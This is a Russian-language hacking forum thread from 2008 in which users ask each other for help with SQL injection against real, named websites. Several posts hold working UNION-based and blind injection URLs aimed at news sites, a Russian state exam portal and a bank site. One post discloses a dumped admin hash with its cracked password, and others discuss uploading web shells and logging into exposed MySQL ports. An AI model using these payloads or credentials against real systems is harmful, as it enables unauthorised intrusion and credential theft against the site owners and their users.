Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://stiri.rol.ro/content/view/129717/-3'+group+by+1/*/

    а дальше хз че делать..у кого какие предложения?
     
  2. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    уверен что это скуль..?)
     
    #2282 sabe, 12 Jun 2008
    Last edited: 12 Jun 2008
  3. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Я ж грю,что шелл не могу залить,ибо путь не знаю =_=.Хеши у мя есть,расшифровал не все,а как зайти в бд ниипу,ибо нету привычной мне phpmyadmin =________________________=.Порт открытый,как я уже сказал,есть - (3306).КАК и ЧЕМ залогиница я не знаю =_=,ибо никогда такого не делал.
     
  4. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Так, ещё у меня проблемка с подзапросами(такой вот Веля нуп).По статье Scipio решил попробывать,и чота (а чо?!) не канает.Вот пример:

    http://www.site.com/script.php?id=38+and+(select+1+from+users)=1/*

    ЗЫ:В таблице 38 полей и я знаю,что таблица users существует, ибо сам из неё выбирал данные)).По идее,должно вернуть ту самую страницу с ид 38,но только без ошибки мускула =_=.Не бейте стульями и табуретками,просто очень нужно :(:(:(
     
  5. Dima-k17

    Dima-k17 Elder - Старейшина

    Joined:
    15 Sep 2005
    Messages:
    29
    Likes Received:
    19
    Reputations:
    20
    2 Велемир
    А если так?
    http://www.site.com/script.php?id=38+and+substring((select+1+from+users),1,1)=1/*
    ---
    2 all.
    У меня тоже вопросик.
    http://www.site.com/aindex.cfm?part=2042513+and+1=1-- - выполняется
    http://www.site.com/aindex.cfm?part=2042513+and+1=0-- - перебрасывает на страницу с ошибкой
    http://www.site.com/aindex.cfm?part=2042513-1-- - выводит http://www.site.com/aindex.cfm?part=2042512
    Как я понимаю тут MSSQL, но вот как его крутить в такой ситуации?
     
  6. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
     
  7. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    Велемир, а я думаю, что табы users на хосте нету, ибо запрос:

    Даёт вывод, а запрос:

    завершается ошибкой...
     
    2 people like this.
  8. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Ничё подобного,твой метод работает))),вот только вывода нету там =_=,потому и нужны подзапросы...
     
  9. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Велемир
    какие подзапросы?
    _http://www.a2k.org.ua/news.php?id=-1978+UNION+SELECT+1,2,3,4,VERSION(),password,user,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%20,29,30,31,32,33,34,35,36,37,38+from+users--
    4.1.22-standard
    d23d8b79f575bcc0eedfb8c4e2f13540
    admin
    Кстати незамысловатый пасс
    admin:repz
     
    #2289 Kakoytoxaker, 12 Jun 2008
    Last edited: 12 Jun 2008
  10. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    это Оракл?
    как реализовать?)
     
  11. l-l00K

    l-l00K Banned

    Joined:
    26 Nov 2006
    Messages:
    233
    Likes Received:
    433
    Reputations:
    287
    там нет скули, ошибка в java
     
    2 people like this.
  12. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    2 sabe
    :D
     
    4 people like this.
  13. MaZaHaKer

    MaZaHaKer Elder - Старейшина

    Joined:
    19 Jan 2008
    Messages:
    93
    Likes Received:
    33
    Reputations:
    0
    никак :)
     
  14. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    спс..) а то я думаю... банк все же))))))
     
  15. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Да сломать то я его уже давно сломал,меня интересует не это.Есть банковский сайт на 4-ой версии,а до сих пор не научилсо работатьс подзапросами нормально =)),ибо там нужно знать,правильно ли ты подобрал таблицу или нет(вывода нету там).Не вслепую же всё подбирать ? Там ничего не выводится и мне нужно знать, как точно определить существование таблицы с юзерами к примеру,чтобы потом спокойно быть уверенным в том,что я правильно подбираю поля к ней.Этот сайт я привёл просто в качестве примера.

    ЗЫ: А пароль меня жосско порадовал,когда hashcracking.info помучил гг)
     
  16. Dima-k17

    Dima-k17 Elder - Старейшина

    Joined:
    15 Sep 2005
    Messages:
    29
    Likes Received:
    19
    Reputations:
    20
    Дык а трабла то в чем?
    Code:
    http://www.a2k.org.ua/news.php?id=-1978+or+ascii(substring((SELECT%201),1,1))=49/*
     
    2 people like this.
  17. sakh_rider

    sakh_rider New Member

    Joined:
    23 Aug 2007
    Messages:
    8
    Likes Received:
    1
    Reputations:
    0
    Доброго времени суток.
    Третий час уже пытаюсь узнать в чем дело:
    SQL иньекция на лицо.
    Составляю запрос
    Code:
    http://www1.ege.edu.ru/administrator/components/com_astatspro/refer.php?id=-1/**/union/**/select/**/1,concat(admin,0x3a,password,0x3a,usertype),concat(admin,0x3a,password,0x3a,SuperAdministrator)/**/from/**/jos_users/*
    Но в ответ пишет:
    Code:
    Error number: 1064
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/* AND typ = 'hyperlink'' at line 3 
    Script stopped.
    Может кто знает в чем дело?
     
  18. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    sakh_rider, дело в том что ты не знаешь что такое sql-inj и как оно работает.

    По теме - фильтруеца "/*"
     
  19. sakh_rider

    sakh_rider New Member

    Joined:
    23 Aug 2007
    Messages:
    8
    Likes Received:
    1
    Reputations:
    0
    Да знаю йа что такое sql injection, да и как работают тоже :rolleyes: ... Уже были сайты, в которых получалось...
    Вот просто множество запросов перепробовал, а вылазит одно и тоже именно на етом сайте :confused:

    "+" тож пробовал(
     
    #2299 sakh_rider, 13 Jun 2008
    Last edited: 13 Jun 2008
  20. sakh_rider

    sakh_rider New Member

    Joined:
    23 Aug 2007
    Messages:
    8
    Likes Received:
    1
    Reputations:
    0
    Блин, столько времени и все зря...
    SELECT command denied to user 'ege'@'pro.iot.ru' for table 'users'
    :( :( :(
     
    1 person likes this.
Thread Status:
Not open for further replies.